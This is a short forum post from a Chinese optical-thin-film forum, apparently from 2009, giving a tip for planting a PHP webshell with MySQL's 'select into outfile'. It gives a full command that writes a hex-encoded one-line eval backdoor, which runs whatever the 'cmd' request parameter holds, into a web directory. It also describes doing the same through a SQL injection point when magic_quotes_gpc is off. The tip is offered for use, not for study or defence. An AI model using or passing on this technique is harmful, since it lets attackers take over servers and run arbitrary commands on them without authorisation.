设为首页收藏本站

 找回密码
 注册
光学薄膜论坛»论坛 免费资源 其它免费资源 select into outfile导出webshell技巧
返回列表 发新帖
查看: 1526|回复: 0

select into outfile导出webshell技巧

[复制链接]
发表于 2009-7-20 22:40:10 | 显示全部楼层 |阅读模式
在网上看到的都是先建立一个表。然后插入一句话木马。再查询并导出,经过我实验 其实不用建表 就可以导出文件的' d" C' U0 m; r0 y
比如我们进入了phpmyadmin,随便点击一个数据库,然后点击sql,接着执行select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3f3e into outfile 'd:/xamp/www/ok.php'即可将一句话导出得到webshell.- t/ z3 k. B) z7 {; J& w: x
遇到php+mysql注入点的时候 如果权限允许并且php.ini里面magic_quotes_gpc=off时候也可以在相应地方直接写入一句话到 web目录,jsp+mysql的话就不需要考虑magic_quotes_gpc...
% `4 O! B' @+ z3 ]7 j
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|光学薄膜论坛

GMT, 2026-6-13 , Processed in 0.108255 second(s), 23 queries .

Powered by Discuz! X3.5 Licensed

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表